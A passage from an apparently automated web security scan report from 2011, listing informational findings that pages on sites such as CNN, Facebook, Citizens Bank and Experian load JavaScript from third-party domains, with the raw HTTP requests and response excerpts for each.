                                                                                                                   <script type="text/javascript" src="http://switch.atdmt.com/jaction/nyccos_COSB_SD_Payroll_Overview/v3/atz.FBBE6C4A1C9B8436"></script>
...[SNIP]...

17.131. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:32 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=06b1a9ee60ea3411d50706d6b4b05184%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=f857207c09785572124d4877b07e3ed2%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:06:32 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 143217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
</div>

<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

17.132. http://www.charterone.com/branchlocator/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /branchlocator/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /branchlocator/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** -->
<script language="JavaScript" type="text/javascript" defer="1" src="https://keywordmax.com/tracking/show.php?id=507865640&blockengines=WS&location=Homepage"></script>
...[SNIP]...

17.133. http://www.charterone.com/greensense/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /greensense/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /greensense/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:30 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <h
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** -->
<script language="JavaScript" type="text/javascript" defer="1" src="https://tracking.keywordmax.com/tracking/show.php?id=507865640&blockengines=WS&location=Homepage"></script>
...[SNIP]...

17.134. http://www.citizensbank.com/branchlocator/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /branchlocator/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /branchlocator/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** -->
<script language="JavaScript" type="text/javascript" defer="1" src="https://keywordmax.com/tracking/show.php?id=507865640&blockengines=WS&location=Homepage"></script>
...[SNIP]...

17.135. http://www.citizensbank.com/greensense/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /greensense/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /greensense/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:52 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <h
...[SNIP]...
<!-- *** CLICK TRACKING CODE 3.0 *** -->
<script language="JavaScript" type="text/javascript" defer="1" src="https://tracking.keywordmax.com/tracking/show.php?id=507865640&blockengines=WS&location=Homepage"></script>
...[SNIP]...

17.136. http://www.cnn.com/2011/TECH/web/01/28/egypt.internet.shutdown/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /2011/TECH/web/01/28/egypt.internet.shutdown/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/TECH/web/01/28/egypt.internet.shutdown/index.html HTTP/1.1
Host: www.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:34 GMT
Server: Apache
Set-Cookie: CG=US:TX:Dallas; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Thu, 03 Feb 2011 01:07:34 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 57590
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/2.0/frame.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/2.0/ad_head0.js"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/cnn/cnn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://i.cdn.turner.com/cnn/.element/css/3.0/connect/overlay.css?20100421">
   <script src="http://i.cdn.turner.com/cnn/.element/js/3.0/protoaculous.1.8.2.min.js" type="text/javascript"></script>
   <script src="http://i.cdn.turner.com/cnn/.element/js/3.0/main.js" type="text/javascript"></script>
   <script src="http://i.cdn.turner.com/cnn/.element/js/3.0/swfobject-2.2.js" type="text/javascript"></script>
   <script src="http://i.cdn.turner.com/cnn/.element/js/3.0/csiManager.js" type="text/javascript"></script>
   <script src="http://i.cdn.turner.com/cnn/.element/js/3.0/StorageManager.js" type="text/javascript"></script>
...[SNIP]...
<!-- Copyright 2001-2006, Clickability, Inc. All rights reserved.-->
<script type="text/javascript" language="javascript1.2" src="http://i.cdn.turner.com/cnn/.element/js/3.0/cnnCustomButton.js"></script>
...[SNIP]...
</script>
<script src="http://i.cdn.turner.com/cnn/.element/js/3.0/omni.time.js" type="text/javascript"></script>
<script src="http://i.cdn.turner.com/cnn/.element/js/3.0/omni.interactive.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2357"></script>
...[SNIP]...
</script><script src="http://i.cdn.turner.com/cnn/.element/js/3.0/easing.js" type="text/javascript"></script>
<script src="http://i.cdn.turner.com/cnn/.element/js/3.0/article.js?id=20100816" type="text/javascript"></script>
<script src="http://i.cdn.turner.com/cnn/.element/js/3.0/video/cvp_suppl.js?id=20100923b" type="text/javascript"></script>
<script src="http://i.cdn.turner.com/cnn/.element/js/3.0/video/cvp.js?id=20100923b" type="text/javascript"></script>
...[SNIP]...
<div class="cnnOpin">
<script language="javascript" type="text/javascript" charset="windows-1252" src="http://i.cdn.turner.com/cnn/.element/js/3.0/oo_engine.js"></script>
...[SNIP]...
</div> <script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/3.0/connect/stry_controls.js?04202010"></script>
<script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/3.0/connect/mynews_storage.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media.disqus.com/themes/cnn2/cnn2.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cnn.disqus.com/embed.js"></script>
...[SNIP]...
<img src="http://i.cdn.turner.com/cnn/images/1.gif" alt="" id="TargetImageDE" name="TargetImageDE" width="1" height="1" onLoad="getDEAdHeadCookie(this)">

<script src="http://js.revsci.net/gateway/gw.js?csid=A09801"></script>
...[SNIP]...
</div> <script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/3.0/storynptracking.js"></script>
...[SNIP]...
<!-- /cnn_ftrcntnt -->
<script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/3.0/weather.footer.js?20100802"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/3.0/edition.vars.js"></script>
...[SNIP]...
</script>

   
<script src="http://i.cdn.turner.com/cnn/.element/js/3.0/s_code.js" type="text/javascript"></script>
<script src="http://i.cdn.turner.com/cnn/.element/js/3.0/jsmd.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End SiteCatalyst code -->

<script src="http://content.dl-rms.com/rms/mother/5721/nodetag.js"></script>
<script language="javascript" src="http://icompass.insightexpressai.com/97.js"></script>
...[SNIP]...

17.137. http://www.courthousenews.com/2011/01/14/33343.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.courthousenews.com
Path:   /2011/01/14/33343.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/14/33343.htm HTTP/1.1
Host: www.courthousenews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:06:38 GMT
Content-Length: 14357
Content-Type: text/html
Last-Modified: Sat, 15 Jan 2011 06:46:55 GMT
Accept-Ranges: bytes
ETag: "e4e10080b4cb1:14365"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type
...[SNIP]...
<br><script type="text/javascript"src="http://w.sharethis.com/button/sharethis.js#publisher=42240697-4801-421a-9d96-cac79aed84c4&amp;type=website&amp;post_services=facebook%2Cdigg%2Cdelicious%2Cybuzz%2Ctwitter%2Cstumbleupon%2Creddit%2Ctechnorati%2Cmixx%2Cblogger%2Ctypepad%2Cwordpress%2Cgoogle_bmarks%2Cwindows_live%2Cmyspace%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin"></script>
...[SNIP]...
<!-- End Wrapper -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.138. http://www.digitalia.be/software/slimbox  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitalia.be
Path:   /software/slimbox

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /software/slimbox HTTP/1.1
Host: www.digitalia.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: 60gp=R1864063875; path=/; expires=Sat, 05-Feb-2011 13:23:25 GMT
Date: Thu, 03 Feb 2011 01:06:39 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/5.3.5
X-UA-Compatible: IE=edge
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31291

...<!DOCTYPE html>
<html lang="fr">
<head>
   <meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
   <title>Slimbox, the ultimate lightweight Lightbox clone .. digitalia.be</title>
   
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Recherche sur digitalia.be" href="/opensearch.xml" />
   <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<p><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

17.139. http://www.directstartv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directstartv.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=5q1pmeo4qcq80k8jsrsa9kggt5; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Thu, 02-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1461b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Wed, 03-Feb-2010 01:07:13 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Wed, 03-Feb-2010 01:07:13 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=149866862; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=162207399; expires=Fri, 03-Feb-2012 01:07:14 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Mon, 04-Apr-2011 01:07:14 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
       </script>
...[SNIP]...
<!--    BEGIN percentmobile-->
   <script src="http://assets.percentmobile.com/percent_mobile.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!--********** JAVASCRIPT **********-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

17.140. http://www.emagazine.com/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emagazine.com
Path:   /view/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/?5489 HTTP/1.1
Host: www.emagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:39 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) mod_perl/1.30 PHP/4.3.4
X-Powered-By: PHP/4.3.4
Set-Cookie: PHPSESSID=ba6bb514b1fca2c3b23a260e9b9739c2; path=/; domain=www.emagazine.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 61787


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    <html><head><title>More Sustainable Sushi (By Brita Belli)</title><meta name=
...[SNIP]...
<br><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=5a3dfb46-bd0c-4707-8454-75915228b408&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

17.141. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enewspf.com
Path:   /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1
Host: www.enewspf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</script><script charset="utf-8" type="text/javascript" src="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822/US/eneparfor-20/8005/9434621a-ec49-437c-b3d1-603e05010245"> </script>
...[SNIP]...
</noscript><script type="text/javascript" src="http://www.costofwar.com/costofwar-embed.js"></script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script><script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.validate.js"></script><script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.form.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<div class="center-content"><script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://www.assoc-amazon.com/s/link-enhancer?tag=eneparfor-20&amp;o=1"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_GB/all.js"></script>
...[SNIP]...

17.142. http://www.experian.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experian.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.experian.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:18:10 GMT
Content-type: text/html
Content-Length: 24951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
   <
...[SNIP]...
<link href="/homepage/css/homepage_min.css" rel="stylesheet" type="text/css" />
       <script type="text/javascript" src="https://adboost.finalid.com/adboost.js"></script>
...[SNIP]...

17.143. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=41jA_; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 01:06:40 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/8v6XwwC31BN.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

17.144. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?action=like&api_key=167973672925&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df39d5d5ad%26origin%3Dhttp%253A%252F%252Fcommunity.invisionpower.com%252Ff27f92d41%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 22:25:45 GMT
Content-Length: 10591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yt/r/CJLVmfhHQeD.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

17.145. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 01:06:43 GMT
Content-Length: 9094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yj/r/xX_iDFXECVt.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

17.146. http://www.filamentgroup.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filamentgroup.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.filamentgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:18:11 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Set-Cookie: exp_last_visit=981353891; expires=Thu, 02-Feb-2012 22:18:11 GMT; path=/
Set-Cookie: exp_last_activity=1296713891; expires=Thu, 02-Feb-2012 22:18:11 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 22:18:11 GMT
Pragma: no-cache
Connection: close
